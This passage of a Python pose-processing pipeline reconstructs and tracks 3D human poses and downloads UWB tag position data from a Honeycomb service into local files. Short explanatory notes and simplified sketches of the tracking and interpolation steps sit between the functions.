raise ValueError('Last timestamp in 2D pose data for time segment starting at {} is {}, which is after end of time segment'.format(
time_segment_start.isoformat(),
poses_2d_df_time_segment['timestamp'].max().isoformat()
))
logger.info('Converting camera assignment IDs to camera device IDs for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(
poses_2d_df=poses_2d_df_time_segment,
camera_device_id_lookup=camera_device_id_lookup,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Converted camera assignment IDs to camera device IDs for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Reconstructing 3D poses for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_3d_df = poseconnect.reconstruct.reconstruct_poses_3d(
poses_2d=poses_2d_df_time_segment,
pose_3d_limits=pose_3d_limits,
pose_model_name=None,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
camera_calibrations=camera_calibrations,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
progress_bar=progress_bar,
notebook=notebook
)
logger.info('Reconstructed 3D poses for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Writing 3D poses to disk for time segment starting at {}'.format(time_segment_start.isoformat()))
process_pose_data.local_io.write_data_local(
data_object=poses_3d_df,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_id=pose_reconstruction_3d_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
def generate_pose_tracks_3d_local_by_time_segment(
base_dir,
environment_id,
pose_reconstruction_3d_inference_id,
start=None,
end=None,
max_match_distance=1.0,
max_iterations_since_last_match=20,
centroid_position_initial_sd=1.0,
centroid_velocity_initial_sd=1.0,
reference_delta_t_seconds=1.0,
reference_velocity_drift=0.30,
position_observation_sd=0.5,
num_poses_per_track_min=11,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose data from local files, assembles them into pose tracks, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment().
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracks_3d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracking_3d_metadata_INFERENCE_ID.pkl\'
Args:
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_reconstruction_3d_inference_id (str): Inference ID for source data
start (datetime): Start of period within source data to be analyzed (default is None)
end (datetime): End of period within source data to be analyzed (default is None)
max_match_distance (float): Maximum distance between 3D pose and predicted pose track for pose to be added to track (default is 1.0)
max_iterations_since_last_match (int): Maximum number of unmatched iterations before pose track is terminated (default is 20)
centroid_position_initial_sd (float): Initial standard deviation for pose track centroid position (default is 1.0)
centroid_velocity_initial_sd (float): Initial standard deviation for pose track centroid velocity (default is 1.0)
reference_delta_t_seconds (float): Reference time period for specifying velocity drift (default is 1.0)
reference_velocity_drift (float): Reference velocity drift (default is 0.30)
position_observation_sd (float): Position observation error (default is 0.5)
num_poses_per_track_min (int): Minimum number of poses in a track (default is 11)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_reconstruction_3d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='pose_reconstruction_3d_metadata',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
if start is None:
start = pose_reconstruction_3d_metadata['parameters']['start']
if end is None:
end = pose_reconstruction_3d_metadata['parameters']['end']
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
logger.info('Generating 3D pose tracks from local 3D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
pose_tracking_3d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_tracking_3d',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'start': start,
'end': end,
'max_match_distance': max_match_distance,
'max_iterations_since_last_match': max_iterations_since_last_match,
'centroid_position_initial_sd': centroid_position_initial_sd,
'centroid_velocity_initial_sd': centroid_velocity_initial_sd,
'reference_delta_t_seconds': reference_delta_t_seconds,
'reference_velocity_drift': reference_velocity_drift,
'position_observation_sd': position_observation_sd,
'num_poses_per_track_min': num_poses_per_track_min
}
)
pose_tracking_3d_inference_id = pose_tracking_3d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_tracking_3d_metadata,
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracking_3d_metadata',
inference_id=pose_tracking_3d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Tracking 3D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
processing_start = time.time()
pose_tracks_3d = None
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
poses_3d_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_3d_df) == 0:
continue
pose_tracks_3d = poseconnect.track.update_pose_tracks_3d(
poses_3d=poses_3d_df,
pose_tracks_3d=pose_tracks_3d,
max_match_distance=max_match_distance,
max_iterations_since_last_match=max_iterations_since_last_match,
centroid_position_initial_sd=centroid_position_initial_sd,
centroid_velocity_initial_sd=centroid_velocity_initial_sd,
reference_delta_t_seconds=reference_delta_t_seconds,
reference_velocity_drift=reference_velocity_drift,
position_observation_sd=position_observation_sd,
progress_bar=False,
notebook=False
)
if num_poses_per_track_min is not None:
pose_tracks_3d.filter(
num_poses_min=num_poses_per_track_min,
inplace=True
)
process_pose_data.local_io.write_data_local(
data_object=pose_tracks_3d.output(),
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_id=pose_tracking_3d_inference_id,
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Processed {:.3f} minutes of 3D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return pose_tracking_3d_inference_id
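The loop above carries `pose_tracks_3d` across segments so that `poseconnect.track.update_pose_tracks_3d()` can match each segment's poses to existing tracks, seed new tracks from unmatched poses, and terminate tracks after `max_iterations_since_last_match` unmatched iterations. A simplified, self-contained sketch of that matching step (greedy nearest-neighbor on centroids; the real implementation additionally predicts each track's centroid with a Kalman filter, which is what the `*_sd` and velocity-drift parameters tune):

```python
import math

def update_tracks(tracks, detections, max_match_distance=1.0, max_misses=20):
    """Greedy nearest-neighbor track update for one time segment.

    Simplified stand-in for poseconnect.track.update_pose_tracks_3d.
    tracks: dict of id -> {'centroid', 'misses', 'count'} (mutated in place)
    detections: list of (x, y, z) pose centroids for this segment
    """
    unmatched = list(range(len(detections)))
    for track_id in list(tracks):
        track = tracks[track_id]
        best, best_dist = None, max_match_distance
        for i in unmatched:
            d = math.dist(track['centroid'], detections[i])
            if d <= best_dist:
                best, best_dist = i, d
        if best is not None:  # pose joins the closest track within range
            track.update(centroid=detections[best], misses=0,
                         count=track['count'] + 1)
            unmatched.remove(best)
        else:  # nothing close enough; eventually terminate stale tracks
            track['misses'] += 1
            if track['misses'] > max_misses:
                del tracks[track_id]
    for i in unmatched:  # leftover poses seed new tracks
        tracks[max(tracks, default=-1) + 1] = {
            'centroid': detections[i], 'misses': 0, 'count': 1
        }
    return tracks
```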
def interpolate_pose_tracks_3d_local_by_pose_track(
base_dir,
environment_id,
pose_tracking_3d_inference_id,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose and pose track data from local files, interpolates to fill gaps in the tracks, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment() and
generate_pose_tracks_3d_local_by_time_segment().
The script looks up the inference ID for the 3D poses in the tracks by
inspecting the metadata from the pose tracking run.
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_3d_INFERENCE_ID.pkl\'
(for new poses) and
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracks_3d_INFERENCE_ID.pkl\'
(for new pose track data).
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_interpolation/ENVIRONMENT_ID/pose_track_3d_interpolation_metadata_INFERENCE_ID.pkl\'
Args:
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_tracking_3d_inference_id (str): Inference ID for source data
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_tracking_3d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracking_3d_metadata',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
start = pose_tracking_3d_metadata['parameters']['start']
end = pose_tracking_3d_metadata['parameters']['end']
pose_reconstruction_3d_inference_id = pose_tracking_3d_metadata['parameters']['pose_reconstruction_3d_inference_id']
logger.info('Interpolating 3D pose tracks from local 3D pose track data and local 3D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}.'.format(
base_dir,
pose_processing_subdirectory,
environment_id
))
logger.info('Generating metadata')
pose_track_3d_interpolation_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_track_3d_interpolation',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'pose_tracking_3d_inference_id': pose_tracking_3d_inference_id,
'start': start,
'end': end
}
)
pose_track_3d_interpolation_inference_id = pose_track_3d_interpolation_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_track_3d_interpolation_metadata,
base_dir=base_dir,
pipeline_stage='pose_track_3d_interpolation',
environment_id=environment_id,
filename_stem='pose_track_3d_interpolation_metadata',
inference_id=pose_track_3d_interpolation_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
num_pose_tracks = len(pose_tracks_3d)
pose_tracks_start = min([pose_track_3d['start'] for pose_track_3d in pose_tracks_3d.values()])
pose_tracks_end = max([pose_track_3d['end'] for pose_track_3d in pose_tracks_3d.values()])
num_poses = sum([len(pose_track_3d['pose_3d_ids']) for pose_track_3d in pose_tracks_3d.values()])
num_minutes = (pose_tracks_end - pose_tracks_start).total_seconds()/60
logger.info('Interpolating {} 3D pose tracks spanning {} poses and {:.3f} minutes: {} to {}'.format(
num_pose_tracks,
num_poses,
num_minutes,
pose_tracks_start.isoformat(),
pose_tracks_end.isoformat()
))
processing_start = time.time()
if task_progress_bar:
if notebook:
pose_track_iterator = tqdm.notebook.tqdm(pose_tracks_3d.items())
else:
pose_track_iterator = tqdm.tqdm(pose_tracks_3d.items())
else:
pose_track_iterator = pose_tracks_3d.items()
pose_tracks_3d_new = dict()
for pose_track_3d_id, pose_track_3d in pose_track_iterator:
pose_track_start = pose_track_3d['start']
pose_track_end = pose_track_3d['end']
pose_3d_ids = pose_track_3d['pose_3d_ids']
poses_3d_in_track_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=pose_track_start,
end=pose_track_end,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=pose_3d_ids,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
poses_3d_new_df = poseconnect.track.interpolate_pose_track(
pose_track_3d=poses_3d_in_track_df
)
if len(poses_3d_new_df) == 0:
continue
process_pose_data.local_io.write_data_local_by_time_segment(
data_object=poses_3d_new_df,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_id=pose_track_3d_interpolation_inference_id,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_new[pose_track_3d_id] = {
'start': pd.to_datetime(poses_3d_new_df['timestamp'].min()).to_pydatetime(),
'end': pd.to_datetime(poses_3d_new_df['timestamp'].max()).to_pydatetime(),
'pose_3d_ids': poses_3d_new_df.index.tolist()
}
process_pose_data.local_io.write_data_local(
data_object=pose_tracks_3d_new,
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_id=pose_track_3d_interpolation_inference_id,
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Processed {} 3D pose tracks in {:.3f} minutes'.format(
num_pose_tracks,
processing_time/60
))
return pose_track_3d_interpolation_inference_id
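`poseconnect.track.interpolate_pose_track()` fills the temporal gaps within a track and returns only the newly created poses, which the loop above then writes under the interpolation run's own inference ID. A rough stand-in using pandas resampling on numeric columns (the real function interpolates full 3D keypoint arrays and assigns new pose IDs):

```python
import pandas as pd

def interpolate_track_gaps(poses_df, freq='100ms'):
    """Fill temporal gaps in one pose track by linear interpolation.

    Rough stand-in for poseconnect.track.interpolate_pose_track; this
    sketch interpolates numeric columns only. Returns just the newly
    created rows, mirroring how the pipeline writes interpolated poses
    under their own inference ID.
    """
    resampled = (
        poses_df
        .set_index('timestamp')
        .resample(freq)       # regular grid at the pose frame rate
        .mean()
        .interpolate(method='linear')
    )
    # Keep only timestamps that were absent from the original track
    new_rows = resampled.loc[~resampled.index.isin(poses_df['timestamp'])]
    return new_rows.reset_index()
```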
def download_position_data_by_datapoint(
start,
end,
base_dir,
environment_id,
source_objects='position_objects',
datapoint_timestamp_min=None,
datapoint_timestamp_max=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
task_progress_bar=False,
notebook=False
):
"""
Fetches UWB position data from Honeycomb and writes it back to local files.
If source_objects is set to \'datapoints\', the function will pull the data
from legacy datapoint objects. In this case, the user must specify
\'datapoint_timestamp_min\' and \'datapoint_timestamp_max\' in addition to
\'start\' and \'end\'. Determination of minimum and maximum datapoint
timestamps for a given start and end time is tricky, because the timestamp
on a UWB datapoint typically captures when the data in that datapoint begins
but the duration of the data in that datapoint is less predictable
(typically about 30 minutes). For this reason, the script asks the user to
explicitly specify minimum and maximum datapoint timestamps rather than
calculating them from the specified start and end times. A reasonable
practice is to set the minimum datapoint timestamp to be about 40 minutes
less than the start time and to set the maximum datapoint timestamp to be
equal to the end time.
Output data is organized into 10 second segments (mirroring videos) and
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/position_data_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data/ENVIRONMENT_ID/download_position_data_metadata_INFERENCE_ID.pkl\'
Args:
start (datetime): Start of position data to fetch
end (datetime): End of position data to fetch
datapoint_timestamp_min (datetime): Minimum UWB data datapoint timestamp to fetch (\'datapoints\' source only)
datapoint_timestamp_max (datetime): Maximum UWB data datapoint timestamp to fetch (\'datapoints\' source only)
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
source_objects (str): Source data in Honeycomb (either \'position_objects\' or \'datapoints\') (default is \'position_objects\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
chunk_size (int): Maximum number of records to pull with Honeycomb request (default is 100)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_min is not None and datapoint_timestamp_min.tzinfo is None:
logger.info('Specified minimum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_min=datapoint_timestamp_min.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_max is not None and datapoint_timestamp_max.tzinfo is None:
logger.info('Specified maximum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_max=datapoint_timestamp_max.replace(tzinfo=datetime.timezone.utc)
logger.info('Downloading person position data from Honeycomb. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
processing_start = time.time()
logger.info('Generating metadata')
download_position_data_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='download_position_data',
parameters={
'datapoint_timestamp_min': datapoint_timestamp_min,
'datapoint_timestamp_max': datapoint_timestamp_max,
'start': start,
'end': end
}
)
download_position_data_inference_id = download_position_data_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=download_position_data_metadata,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='download_position_data_metadata',
inference_id=download_position_data_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Downloading people position data for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
logger.info('Fetching person tag info from Honeycomb for specified environment and time span')
person_tag_info_df = honeycomb_io.fetch_person_tag_info(
start=start,
end=end,
environment_id=environment_id,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
device_ids = person_tag_info_df['device_id'].unique().tolist()
assignment_ids = person_tag_info_df.index.tolist()
logger.info('Found {} person tags for specified environment and time span'.format(
len(device_ids)
))
if source_objects == 'position_objects':
logger.info('Fetching position objects for these tags and specified start/end and writing to local files')
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
position_data_df = honeycomb_io.fetch_cuwb_position_data(
start=time_segment_start - datetime.timedelta(milliseconds=500),
end=time_segment_start + datetime.timedelta(milliseconds=10500),
device_ids=device_ids,
environment_id=None,
environment_name=None,
device_types=['UWBTAG'],
output_format='dataframe',
sort_arguments=None,
chunk_size=1000,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
# There seem to be some duplicates in honeycomb
if position_data_df.duplicated(subset=set(position_data_df.columns).difference(['socket_read_time'])).any():
logger.warning('Duplicate position records found in time segment {}. Deleting duplicates.'.format(
time_segment_start.isoformat()
))
position_data_df.drop_duplicates(
subset=set(position_data_df.columns).difference(['socket_read_time']),
inplace=True
)
if len(position_data_df) == 0:
continue
position_data_df = (
position_data_df
.join(
(
person_tag_info_df.set_index('device_id')
.reindex(columns=['person_id'])
),
on='device_id'
)
.rename(columns={
'x': 'x_position',
'y': 'y_position',
'z': 'z_position'
})
.reindex(columns=[
'timestamp',
'person_id',
'x_position',
'y_position',
'z_position'
])
)
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'person_id'
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
]
process_pose_data.local_io.write_data_local(
data_object=position_data_df,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_id=download_position_data_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
elif source_objects == 'datapoints':
logger.info('Fetching UWB datapoint IDs for these tags and specified datapoint timestamp min/max')
data_ids = honeycomb_io.fetch_uwb_data_ids(
datapoint_timestamp_min=datapoint_timestamp_min,
datapoint_timestamp_max=datapoint_timestamp_max,
assignment_ids=assignment_ids,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Found {} UWB datapoint IDs for these tags and specified datapoint timestamp min/max'.format(
len(data_ids)
))
logger.info('Fetching position data from each of these UWB datapoints and writing to local files')
if task_progress_bar:
if notebook:
data_id_iterator = tqdm.notebook.tqdm(data_ids)
else:
data_id_iterator = tqdm.tqdm(data_ids)
else:
data_id_iterator = data_ids
for data_id in data_id_iterator:
position_data_df = honeycomb_io.fetch_uwb_data_data_id(
data_id=data_id,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if len(position_data_df) == 0:
continue
position_data_df = honeycomb_io.extract_position_data(
df=position_data_df
)
if len(position_data_df) == 0:
continue
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'assignment_id',
'object_id',
'serial_number',
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = honeycomb_io.add_person_tag_info(
uwb_data_df=position_data_df,
person_tag_info_df=person_tag_info_df
)
for time_segment_start in time_segment_start_list:
position_data_time_segment_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
].reset_index(drop=True)
if len(position_data_time_segment_df) == 0:
continue
process_pose_data.local_io.write_data_local(
data_object=position_data_time_segment_df,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_id=download_position_data_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
else:
raise ValueError('Source object specification \'{}\' not recognized'.format(
source_objects
))
processing_time = time.time() - processing_start
logger.info('Downloaded {:.3f} minutes of position data in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return download_position_data_inference_id
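The docstring's rule of thumb for the 'datapoints' source (minimum datapoint timestamp about 40 minutes before the start time, maximum equal to the end time) can be captured in a small helper. This is an illustrative convenience, not part of the pipeline API, and 'lookback_minutes' is a hypothetical parameter:

```python
import datetime

def datapoint_timestamp_window(start, end, lookback_minutes=40):
    """Suggested datapoint timestamp bounds for a requested start/end.

    UWB datapoint timestamps mark where a datapoint's data begins, and a
    datapoint typically spans ~30 minutes, so looking back ~40 minutes
    from 'start' should cover it. Hypothetical helper, not pipeline API.
    """
    if start.tzinfo is None:  # mirror the pipeline's timezone handling
        start = start.replace(tzinfo=datetime.timezone.utc)
    if end.tzinfo is None:
        end = end.replace(tzinfo=datetime.timezone.utc)
    return start - datetime.timedelta(minutes=lookback_minutes), end
```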
def download_position_data_trays_by_datapoint(
start,
end,
base_dir,
environment_id,
source_objects='position_objects',
datapoint_timestamp_min=None,
datapoint_timestamp_max=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
task_progress_bar=False,
notebook=False
):
"""
Fetches UWB position data for trays from Honeycomb and writes it back to local files.
The main function, download_position_data_by_datapoint(), focuses on
people positions because those are what pose track identification
requires. The equivalent function for trays is included here to keep
things parallel and because some downstream visualizations require both.
If source_objects is set to \'datapoints\', the function will pull the data
from legacy datapoint objects. In this case, the user must specify
\'datapoint_timestamp_min\' and \'datapoint_timestamp_max\' in addition to
\'start\' and \'end\'. Determination of minimum and maximum datapoint
timestamps for a given start and end time is tricky, because the timestamp
on a UWB datapoint typically captures when the data in that datapoint begins
but the duration of the data in that datapoint is less predictable
(typically about 30 minutes). For this reason, the script asks the user to
explicitly specify minimum and maximum datapoint timestamps rather than
calculating them from the specified start and end times. A reasonable
practice is to set the minimum datapoint timestamp to be about 40 minutes
less than the start time and to set the maximum datapoint timestamp to be
equal to the end time.
Output data is organized into 10 second segments (mirroring videos) and
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data_trays/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/position_data_trays_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data_trays/ENVIRONMENT_ID/download_position_data_trays_metadata_INFERENCE_ID.pkl\'
Args:
start (datetime): Start of position data to fetch
end (datetime): End of position data to fetch
datapoint_timestamp_min (datetime): Minimum UWB data datapoint timestamp to fetch (\'datapoints\' source only)
datapoint_timestamp_max (datetime): Maximum UWB data datapoint timestamp to fetch (\'datapoints\' source only)
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
source_objects (str): Source data in Honeycomb (either \'position_objects\' or \'datapoints\') (default is \'position_objects\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
chunk_size (int): Maximum number of records to pull with Honeycomb request (default is 100)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
